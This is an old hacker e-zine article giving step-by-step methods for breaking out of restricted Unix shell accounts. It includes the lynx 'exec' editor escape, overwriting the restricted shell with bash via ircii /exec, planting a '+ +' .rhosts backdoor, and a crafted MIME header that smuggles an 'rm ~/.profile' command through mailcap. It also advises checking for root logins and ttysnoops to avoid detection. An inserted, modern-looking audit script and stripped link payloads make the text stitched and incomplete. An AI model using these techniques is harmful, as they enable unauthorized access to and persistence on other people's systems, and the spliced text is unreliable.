.Official Brain Candy Release.

.:[ Tricks and Tips on Taking Over of a Restricted Shell Account ]:.

by headflux (headflux@hempseed.com)
6/11/98

Shoutouts to Brain Candy - http://www.cybershocks.com/bc

There are several methods of how to break out of a restricted shell, but first you have to know what a restricted shell is. On a normal login into a unix system, after you enter your username and password it will automatically run the shell listed in /etc/passwd. What kind of prompt you get depends on what shell you are running. There is usually a list of available shells in /etc/shells.

A restricted shell is a program that replaces a normal shell and only allows you to run the programs that the admin deems appropriate. In most restricted shells, instead of getting a prompt, you get a menu. Here's an example:

----------------------------------------------------------------
Welcome to lame.site.com running Linux 2.0.34!

lame login: guest
Password:
Last login: Sun May 17 06:09:06 on ttyp2.
No mail.

lame.site.com guest menu

(lynx)   - Browse the web using lynx
(pine)   - Check your mail using pine
(irc)    - Irc chat using ircii
(telnet) - Telnet to another site
(exit)   - Log you out

Command:
----------------------------------------------------------------

Once you're on the system you want to make sure that you actually are on a restricted shell and not just on a regular shell running a menu program. To do this press CTRL^C, CTRL^D, or CTRL^Z. Doing this will terminate the menu program. If it actually is a restricted shell it will most likely log you out of the system and you'll have to log back in again. But if it is just a menu program it should drop you to a normal shell.
Assuming that you're running a bash shell, you should get something like this:

lame:~$

You may also try typing in invalid input to get the menu program to crash. An example of this would be typing in a long row of characters or symbols, or typing in commands with long invalid arguments. If you do get a prompt and are not logged out, then you are pretty much home free.

Let me explain how this works. When you first log in to a system running bash, it searches for a file in your home directory called .bash_login. If it can't read .bash_login or it does not exist, then it looks for a file called .profile. These files usually contain a list of commands which are automatically run when you log in. So while your real shell might be /bin/bash, .profile might tell bash to run /bin/restricted. When you get the menu program to crash it drops you back into /bin/bash.

The shell runs the menu, and the "user" interacts with the menu:

(shell) --> menu <-- [user]

But when the "user" gets the menu to crash, the "user" gets dropped back to the shell and can now interact directly with the shell:

(shell) <-- [user]

Now let's change a few things around so you don't have to go through this every time. First run the "ls -la" command to get a full listing of your home directory.
You should get something like this:

----------------------------------------------------------------
lame:~$ ls -la
total 89
drwx------   3 guest    users        1024 May 17 11:14 ./
drwxr-xr-x   6 root     root         1024 May 17 06:08 ../
-rw-r--r--   1 guest    users         512 May 18 08:58 .bash_history
-rw-r--r--   1 guest    users          14 May 17 06:08 .profile
-rw-r--r--   1 guest    users          34 May 17 06:08 .less
-rw-r--r--   1 guest    users         114 May 17 06:08 .lessrc
----------------------------------------------------------------

To see what .profile contains type:

----------------------------------------------------------------
lame:~$ cat .profile
/bin/restricted
----------------------------------------------------------------

Now, under normal circumstances, you should be able to just delete .profile by typing "rm .profile" and you would have successfully changed the restricted shell to an unrestricted shell, but the admin might be smart enough to protect against that. If you do get a permission denied error, then create a file called .bash_login using the following command:

lame:~$ echo > .bash_login

As I said earlier, when you log on using bash it searches for a file called .bash_login, and if .bash_login doesn't exist it searches for and runs .profile; it will only run one of these files, and normally it looks for .bash_login first. So creating an empty file called .bash_login makes .profile useless.
You can tell what shell you're using with the command:

----------------------------------------------------------------
lame:~$ cat /etc/passwd | grep guest
guest:x:405:100:guest:/home/guest:/bin/bash
----------------------------------------------------------------

If you are not familiar with the unix passwd file format then this should explain a little:

Username:          guest
Shadowed Password: x
User id:           405
Group id:          100
Real Name:         guest
Home Directory:    /home/guest
Shell:             /bin/bash

On most restricted shells it will not be set up this way; instead of you running /bin/bash and /bin/bash running a menu program, it runs the menu program from the beginning. Thus you would want to somehow get the menu to run a shell. But the whole reason for having a restricted shell in the first place is so that the user cannot run programs the admin doesn't want you to, the program the admin doesn't want you to run being the shell. Therefore we have to make one of the programs that you are allowed to run, run a shell.

(menu) --> allowed program --> restricted program: shell <-- [user]

Let's take a look again at the programs you have access to:

(lynx)   - Browse the web using lynx
(pine)   - Check your mail using pine
(irc)    - Irc chat using ircii
(telnet) - Telnet to another site

There is nothing you can really do with telnet, so let's rule that one out. You end up with lynx, pine, and ircii. These are all popular (and also vulnerable) programs that should be available from restricted shells on most systems.

You don't always have to get the program to run a shell. If you are able to create a file in your home directory called .rhosts containing "+ +", then you may be able to log in through rshd (the remote login daemon). But just because you have a .rhosts file doesn't always mean you can remotely log in. It also depends on how rshd and inetd are configured.
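As an added defender-side check, not part of the original article: a POSIX sh audit that flags, for one account, the weaknesses described above (an unrestricted login shell in /etc/passwd, a user-writable home directory or bash startup file, and a wildcard .rhosts). The function names, the constructed passwd line and the fixture directories are assumptions for the demo; bash also checks ~/.bash_profile before .bash_login, so the loop covers all three startup files.

```shell
# Added audit helper (not from the original article). It flags, on one
# account, the weaknesses the article walks through. Names are hypothetical.
owner_writable() {
    # Third character of the ls mode string is the owner's write bit.
    [ "$(ls -ld "$1" | cut -c3)" = "w" ]
}
# usage: audit_restricted_account PASSWD_FILE USER HOME_DIR RESTRICTED_SHELL
# Prints one line per finding and returns the number of findings.
audit_restricted_account() {
    passwd=$1 user=$2 home=$3 rshell=$4 n=0
    shell=$(awk -F: -v u="$user" '$1 == u { print $7 }' "$passwd")
    if [ "$shell" != "$rshell" ]; then
        echo "login shell is '$shell', not $rshell: a crashed menu drops to a real shell"
        n=$((n + 1))
    fi
    if owner_writable "$home"; then
        echo "home dir is owner-writable: user can create .bash_login/.bash_profile"
        n=$((n + 1))
    fi
    # bash runs the first of these three it finds, so all three must be locked down.
    for f in .bash_profile .bash_login .profile; do
        if [ -e "$home/$f" ] && owner_writable "$home/$f"; then
            echo "$f is owner-writable: the /bin/restricted line can be removed"
            n=$((n + 1))
        fi
    done
    if [ -f "$home/.rhosts" ] && grep -q '^[[:space:]]*+' "$home/.rhosts"; then
        echo ".rhosts contains a wildcard entry: passwordless rsh/rlogin"
        n=$((n + 1))
    fi
    return "$n"
}

# Constructed fixture mirroring the article's guest account (sample data only).
make_weak_fixture() {
    d=$(mktemp -d); mkdir -p "$d/home/guest"
    printf 'guest:x:405:100:guest:%s/home/guest:/bin/bash\n' "$d" > "$d/passwd"
    printf '/bin/restricted\n' > "$d/home/guest/.profile"
    printf '+ +\n' > "$d/home/guest/.rhosts"
    chmod 700 "$d/home/guest"; chmod 644 "$d/home/guest/.profile"; echo "$d"
}
# The same account hardened: restricted login shell, read-only home and .profile.
make_hardened_fixture() {
    d=$(mktemp -d); mkdir -p "$d/home/guest"
    printf 'guest:x:405:100:guest:%s/home/guest:/bin/restricted\n' "$d" > "$d/passwd"
    printf '/bin/restricted\n' > "$d/home/guest/.profile"
    chmod 444 "$d/home/guest/.profile"; chmod 555 "$d/home/guest"; echo "$d"
}
dir=$(make_weak_fixture)
audit_restricted_account "$dir/passwd" guest "$dir/home/guest" /bin/restricted || echo "$? finding(s)"
```

Run against the weak fixture it reports four findings; against the hardened one it reports none.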
Normally there is a file /etc/hosts.equiv which contains a list of hosts that are considered "equivalent", or trusted enough to be allowed to remotely log on. Whether or not the system you're on uses /etc/hosts.equiv or even runs rshd depends on the system.

To create a .rhosts file from a standard shell use:

lame:~$ echo + + > ~/.rhosts

Usually you should be able to create a .rhosts file in ircii using the following command:

/exec echo + + > ~/.rhosts

You can easily see how a system is set up by looking at its configuration files in the /etc directory. If you're in a restricted shell, you can still do this by starting up lynx. For those of you who do not know what lynx is, it's a text-based www browser. Once it's running, press "g" for goto. Then type in "/etc" and press enter and you should get a directory listing of /etc. This is also possible in ircii using the commands:

/exec cd /etc; ls -la
/exec cat /etc/"file"

You might also want to check out your home directory to see what's in there.

Note: In lynx, .bash_login, .profile, and any other files with "." at the beginning will not show up unless you go into options and enable showing files that begin with a ".".

Now, the easiest way to get a normal shell from a restricted shell is to use the following method. If you don't already have lynx running then go ahead and start it up. Once it's open, press "o" for a list of options.
You should get a screen that looks something like this:

----------------------------------------------------------------
                    Options Menu (Lynx Version 2.6)

     E)ditor                      : NONE
     D)ISPLAY variable            : NONE
     B)ookmark file               : lynx_bookmarks.html
     F)TP sort criteria           : By Filename
     P)ersonal mail address       : NONE
     S)earching type              : CASE INSENSITIVE
     display (C)haracter set      : ISO Latin 1
     Raw 8-bit or CJK m(O)de      : ON
     preferred document lan(G)uage: en
     preferred document c(H)arset : NONE
     V)I keys                     : OFF
     e(M)acs keys                 : OFF
     K)eypad mode                 : Numbers act as arrows
     li(N)e edit style            : Default Binding
     l(I)st directory style       : Mixed style
     sho(W) dot files             : OFF
     U)ser mode                   : Novice
     user (A)gent                 : Lynx/2.6 libwww-FM/2.14

Select capital letter of option line, '>' to save, or 'r' to return to Lynx.
Command:
----------------------------------------------------------------

Press "e" to select editor, and type in "exec" then press enter. You should get a "value accepted" message at the bottom of your screen. After that press "r" to return to lynx. Now hit the "g" key. You should get a message that says "URL to open:". Type in "/bin/bash" or any other shell you want to run and then press enter. It should display the binary for /bin/bash on the local system. If it doesn't, try typing in the pathname of a different shell.
You should get a screen similar to this:

----------------------------------------------------------------
                                                        (p1 of 117)
ELF ... /lib/ld-linux.so.1 ...
[raw binary contents of /bin/bash, followed by its symbol table:
 libtermcap.so.2 strcpy ioctl tgetnum _DYNAMIC tgoto getenv ... libc.so.5 ...]

-- press space for next page --
  Arrow keys: Up and Down to move.  Right to follow a link; Left to go back.
 H)elp O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history
----------------------------------------------------------------

Hit the "e" key to edit /bin/bash, and instead of editing it, lynx executes it. Now at the bottom of your screen you should have a "$" bash prompt. Type "clear" to clear the screen and start typing away. When you type "exit" it'll return you to lynx.
This happens because lynx, under normal operation, would run:

'editor' 'file'

But there is a small coding flaw, so that when you change the editor to "exec" and the file to a program, it runs "exec" instead of the normal editor and executes the file, which in this case is a program. This is a classic problem in a lot of programs. (Later Lynx releases address this class of escape with the -anonymous and -restrictions options, which let an admin disable features such as the editor, goto and download for restricted accounts.)

There are also several other ways to get lynx to run commands/create files. A problem in lynx's protocol handling routines allows you to execute simple commands. The only problem is that you have to have access to a web server and be able to easily upload html files. First create an html file containing the following and upload it to a web server. Try to get the href all on one line:

----------------------------------------------------------------
links
----------------------------------------------------------------

This link translates into echo "+ +" > .rhosts, which will create a file .rhosts containing + + and allow you to remotely log in. Whether this works or not depends on what version of lynx you're running. You might also want to try running different commands. Just convert the letters to hexadecimal and add a "%" in front.

There is another major flaw in lynx. Whether or not it's viewed as a flaw depends on what viewpoint you're looking at it from. Lynx allows you to download files into your home directory. If the restricted shell you're running is in your home directory and you have write access to it, then you can easily replace it with another shell. Run lynx, open up /bin, highlight "bash" (or whichever shell you want to use), and press "d" for download. Select save to disk and when it asks you what filename you want to give it, type in the name of the restricted shell. When it asks you whether or not to overwrite it, press "y". Before you can run your new shell, you have to give yourself permission to execute it. Otherwise when you try logging in again you will get a permission denied error.
The only problem is that by the time you get all this done, the shell will have:

1. Crashed, because it has been replaced by another program.
2. The restricted shell will be copied back over the downloaded shell.

Therefore, you need to download the new shell (/bin/bash) into your directory, save it under a different name, give yourself permission to run it, then move it over the top of the existing restricted shell. Using lynx this can be done with the following links:

----------------------------------------------------------------
link 1

link 2
----------------------------------------------------------------

Again, try to get the hrefs all on one line. Or an easier way would be to use ircii:

/exec chmod 755 "shell"
/exec cp "shell" "restricted shell"

If there are any files in your home directory that you want to write over but don't have write permission to, there is a bug in certain versions of pine which will allow you to do so. Just send a letter to the guest account. Attach whatever file you want to replace the file with, and when you receive it with the guest account, save it over the old file.

You can also execute commands from pine by taking advantage of a vulnerability in mailcap. Send yourself the following email, replacing the commands with the ones you want to use:

----------------------------------------------------------------
MIME-Version: 1.0
Content-Type: multipart/alternative;
        boundary="----=_NextPart_000_0007_01BD5F09.B6797740"

------=_NextPart_000_0007_01BD5F09.B6797740
Content-Type: default; encoding="\\\"x\\\"\ ==\ \\\"x\\\"\ \)\ rm\ \~/.profile"
Content-Transfer-Encoding: quoted-printable

test

------=_NextPart_000_0007_01BD5F09.B6797740--
----------------------------------------------------------------

Once you're logged in under a normal shell, there are a couple of precautions you should take to avoid having the admin notice what you're doing. First, whenever you log in, use the "w"/"who" command to see if root is logged on:

----------------------------------------------------------------
lame:~$ w
  2:43pm  up  3:43,  2 users,  load average: 1.14, 1.11, 1.02
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
headflux tty1                      11:00am  1.00s  3:33   3:32  w
root     tty2                       2:43pm  8.00s  0.42s  0.42s -bash
----------------------------------------------------------------

Second, make sure the admin isn't using a tty hijacking program to watch what you are doing.
You can do this by:

----------------------------------------------------------------
lame:~$ cd /etc; cat inetd.conf | grep telnet
telnet  stream  tcp  nowait  root  /usr/sbin/tcpd  in.telnetd -L /bin/ttysnoops
----------------------------------------------------------------

If ttysnoops comes up then beware. The admin can see what you're doing even if he's not logged in.

That concludes this article, more to come soon.

- headflux (headflux@hempseed.com)

EOF